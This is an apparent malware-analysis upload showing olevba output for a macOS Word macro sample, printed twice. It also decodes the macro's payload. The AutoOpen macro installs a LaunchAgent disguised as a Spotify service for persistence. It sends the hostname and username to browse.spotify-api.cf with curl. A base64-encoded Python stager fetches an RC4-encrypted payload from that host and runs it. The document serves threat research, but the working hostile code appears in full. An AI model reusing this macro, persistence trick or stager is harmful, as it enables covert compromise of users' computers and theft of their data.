JohnLaTwC · September 29, 2018 01:11
diff --git a/e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a b/e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
 ## Uploaded by @JohnLaTwC
 ## e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
 olevba3 0.53.1 - http://decalage.info/python/oletools
 Flags        Filename                                                         
 -----------  -----------------------------------------------------------------
 OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
 ===============================================================================
 Type: OpenXML
 -------------------------------------------------------------------------------
 VBA MACRO ThisDocument.cls 
 in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 (empty macro)
 -------------------------------------------------------------------------------
 VBA MACRO NewMacros.bas 
 in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 Private Declare PtrSafe Function system Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr

 Sub AutoOpen()
    Dim path As String
    Dim arg As String
    Dim cmd As String
    Dim result As LongPtr
    cmd = "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS"
    cmd = cmd + "4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzEzXz"
    cmd = cmd + "YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2"
    cmd = cmd + "Vja28pIENocm9tZS82OS4wLjM0OTcuODEgU2FmYXJpLzUzNy"
    cmd = cmd + "4zNic7c2VydmVyPSdodHRwOi8vYnJvd3NlLnNwb3RpZnktYX"
    cmd = cmd + "BpLmNmOjgwJzt0PScvdXBkYXRlJztyZXE9dXJsbGliMi5SZX"
    cmd = cmd + "F1ZXN0KHNlcnZlcit0KTsKcmVxLmFkZF9oZWFkZXIoJ1VzZX"
    cmd = cmd + "ItQWdlbnQnLFVBKTsKcmVxLmFkZF9oZWFkZXIoJ0Nvb2tpZS"
    cmd = cmd + "csInNlc3Npb249ZDlKakxQWWxKbEROeGdLR3pHV0ZFOW5tT1"
    cmd = cmd + "hjPSIpOwpwcm94eSA9IHVybGxpYjIuUHJveHlIYW5kbGVyKC"
    cmd = cmd + "k7Cm8gPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihwcm94eSk7Cn"
    cmd = cmd + "VybGxpYjIuaW5zdGFsbF9vcGVuZXIobyk7CmE9dXJsbGliMi"
    cmd = cmd + "51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT"
    cmd = cmd + "1hWzQ6XTtrZXk9SVYrJzM1ZGYyYzM4MmQ2MGMyZjYxZDIyMW"
    cmd = cmd + "ZlNzUwZjFmYjFkJztTLGosb3V0PXJhbmdlKDI1NiksMCxbXQ"
    cmd = cmd + "pmb3IgaSBpbiByYW5nZSgyNTYpOgogICAgaj0oaitTW2ldK2"
    cmd = cmd + "9yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYKICAgIFNbaV0sU1"
    cmd = cmd + "tqXT1TW2pdLFNbaV0KaT1qPTAKZm9yIGNoYXIgaW4gZGF0YT"
    cmd = cmd + "oKICAgIGk9KGkrMSklMjU2CiAgICBqPShqK1NbaV0pJTI1Ng"
    cmd = cmd + "ogICAgU1tpXSxTW2pdPVNbal0sU1tpXQogICAgb3V0LmFwcG"
    cmd = cmd + "VuZChjaHIob3JkKGNoYXIpXlNbKFNbaV0rU1tqXSklMjU2XS"
    cmd = cmd + "kpCmV4ZWMoJycuam9pbihvdXQpKQ=='));"
    path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.spotify-browser-api.plist"
    arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _
    "<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">\n" & _
    "<plist version=""1.0"">\n" & _
    "<dict>\n" & _
    "<key>Label</key>\n" & _
    "<string>com.spotify.browser-api</string>\n" & _
    "<key>ProgramArguments</key>\n" & _
    "<array>\n" & _
    "<string>python</string>\n" & _
    "<string>-c</string>\n" & _
    "<string>" & cmd & "</string>" & _
    "</array>\n" & _
    "<key>RunAtLoad</key>" & _
    "<true/>" & _
    "<key>StartInterval</key>\n" & _
    "<integer>100</integer>\n" & _
    "<key>KeepAlive</key>\n" & _
    "<dict>\n" & _
    "<key>NetworkState</key>\n" & _
    "<true/>\n" & _
    "</dict>\n" & _
    "</dict>\n" & _
    "</plist>"
    result = system("echo """ & arg & """ > '" & path & "'", "r")
    result = system("curl -A'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36' -sLk https://browse.spotify-api.cf/connect -d""`hostname;whoami`""", "r")
 End Sub

 ## decodes to:
 import sys;import urllib2;
 UA='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36';server='http://browse.spotify-api.cf:80';t='/update';req=urllib2.Request(server+t);
 req.add_header('User-Agent',UA);
 req.add_header('Cookie',"session=d9JjLPYlJlDNxgKGzGWFE9nmOXc=");
 proxy = urllib2.ProxyHandler();
 o = urllib2.build_opener(proxy);
 urllib2.install_opener(o);
 a=urllib2.urlopen(req).read();
 IV=a[0:4];data=a[4:];key=IV+'35df2c382d60c2f61d221fe750f1fb1d';S,j,out=range(256),0,[]
 for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
 i=j=0
 for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
 exec(''.join(out))
	## Uploaded by @JohnLaTwC
	## e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
	olevba3 0.53.1 - http://decalage.info/python/oletools
	Flags Filename
	----------- -----------------------------------------------------------------
	OpX:MASI-B-- e92833f056a197851a5476240a4f3ca94aa8f180e057bb022842dbdd3dbdaf1a
	===============================================================================
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisDocument.cls
	in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	(empty macro)
	-------------------------------------------------------------------------------
	VBA MACRO NewMacros.bas
	in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	Private Declare PtrSafe Function system Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr

	Sub AutoOpen()
	Dim path As String
	Dim arg As String
	Dim cmd As String
	Dim result As LongPtr
	cmd = "import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS"
	cmd = cmd + "4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzEzXz"
	cmd = cmd + "YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2"
	cmd = cmd + "Vja28pIENocm9tZS82OS4wLjM0OTcuODEgU2FmYXJpLzUzNy"
	cmd = cmd + "4zNic7c2VydmVyPSdodHRwOi8vYnJvd3NlLnNwb3RpZnktYX"
	cmd = cmd + "BpLmNmOjgwJzt0PScvdXBkYXRlJztyZXE9dXJsbGliMi5SZX"
	cmd = cmd + "F1ZXN0KHNlcnZlcit0KTsKcmVxLmFkZF9oZWFkZXIoJ1VzZX"
	cmd = cmd + "ItQWdlbnQnLFVBKTsKcmVxLmFkZF9oZWFkZXIoJ0Nvb2tpZS"
	cmd = cmd + "csInNlc3Npb249ZDlKakxQWWxKbEROeGdLR3pHV0ZFOW5tT1"
	cmd = cmd + "hjPSIpOwpwcm94eSA9IHVybGxpYjIuUHJveHlIYW5kbGVyKC"
	cmd = cmd + "k7Cm8gPSB1cmxsaWIyLmJ1aWxkX29wZW5lcihwcm94eSk7Cn"
	cmd = cmd + "VybGxpYjIuaW5zdGFsbF9vcGVuZXIobyk7CmE9dXJsbGliMi"
	cmd = cmd + "51cmxvcGVuKHJlcSkucmVhZCgpOwpJVj1hWzA6NF07ZGF0YT"
	cmd = cmd + "1hWzQ6XTtrZXk9SVYrJzM1ZGYyYzM4MmQ2MGMyZjYxZDIyMW"
	cmd = cmd + "ZlNzUwZjFmYjFkJztTLGosb3V0PXJhbmdlKDI1NiksMCxbXQ"
	cmd = cmd + "pmb3IgaSBpbiByYW5nZSgyNTYpOgogICAgaj0oaitTW2ldK2"
	cmd = cmd + "9yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYKICAgIFNbaV0sU1"
	cmd = cmd + "tqXT1TW2pdLFNbaV0KaT1qPTAKZm9yIGNoYXIgaW4gZGF0YT"
	cmd = cmd + "oKICAgIGk9KGkrMSklMjU2CiAgICBqPShqK1NbaV0pJTI1Ng"
	cmd = cmd + "ogICAgU1tpXSxTW2pdPVNbal0sU1tpXQogICAgb3V0LmFwcG"
	cmd = cmd + "VuZChjaHIob3JkKGNoYXIpXlNbKFNbaV0rU1tqXSklMjU2XS"
	cmd = cmd + "kpCmV4ZWMoJycuam9pbihvdXQpKQ=='));"
	path = Environ("HOME") & "/../../../../Library/LaunchAgents/~$com.spotify-browser-api.plist"
	arg = "<?xml version=""1.0"" encoding=""UTF-8""?>\n" & _
	"<!DOCTYPE plist PUBLIC ""-//Apple//DTD PLIST 1.0//EN"" ""http://www.apple.com/DTDs/PropertyList-1.0.dtd"">\n" & _
	"<plist version=""1.0"">\n" & _
	"<dict>\n" & _
	"<key>Label</key>\n" & _
	"<string>com.spotify.browser-api</string>\n" & _
	"<key>ProgramArguments</key>\n" & _
	"<array>\n" & _
	"<string>python</string>\n" & _
	"<string>-c</string>\n" & _
	"<string>" & cmd & "</string>" & _
	"</array>\n" & _
	"<key>RunAtLoad</key>" & _
	"<true/>" & _
	"<key>StartInterval</key>\n" & _
	"<integer>100</integer>\n" & _
	"<key>KeepAlive</key>\n" & _
	"<dict>\n" & _
	"<key>NetworkState</key>\n" & _
	"<true/>\n" & _
	"</dict>\n" & _
	"</dict>\n" & _
	"</plist>"
	result = system("echo """ & arg & """ > '" & path & "'", "r")
	result = system("curl -A'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36' -sLk https://browse.spotify-api.cf/connect -d""`hostname;whoami`""", "r")
	End Sub

	## decodes to:
	import sys;import urllib2;
	UA='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36';server='http://browse.spotify-api.cf:80';t='/update';req=urllib2.Request(server+t);
	req.add_header('User-Agent',UA);
	req.add_header('Cookie',"session=d9JjLPYlJlDNxgKGzGWFE9nmOXc=");
	proxy = urllib2.ProxyHandler();
	o = urllib2.build_opener(proxy);
	urllib2.install_opener(o);
	a=urllib2.urlopen(req).read();
	IV=a[0:4];data=a[4:];key=IV+'35df2c382d60c2f61d221fe750f1fb1d';S,j,out=range(256),0,[]
	for i in range(256):
	j=(j+S[i]+ord(key[i%len(key)]))%256
	S[i],S[j]=S[j],S[i]
	i=j=0
	for char in data:
	i=(i+1)%256
	j=(j+S[i])%256
	S[i],S[j]=S[j],S[i]
	out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
	exec(''.join(out))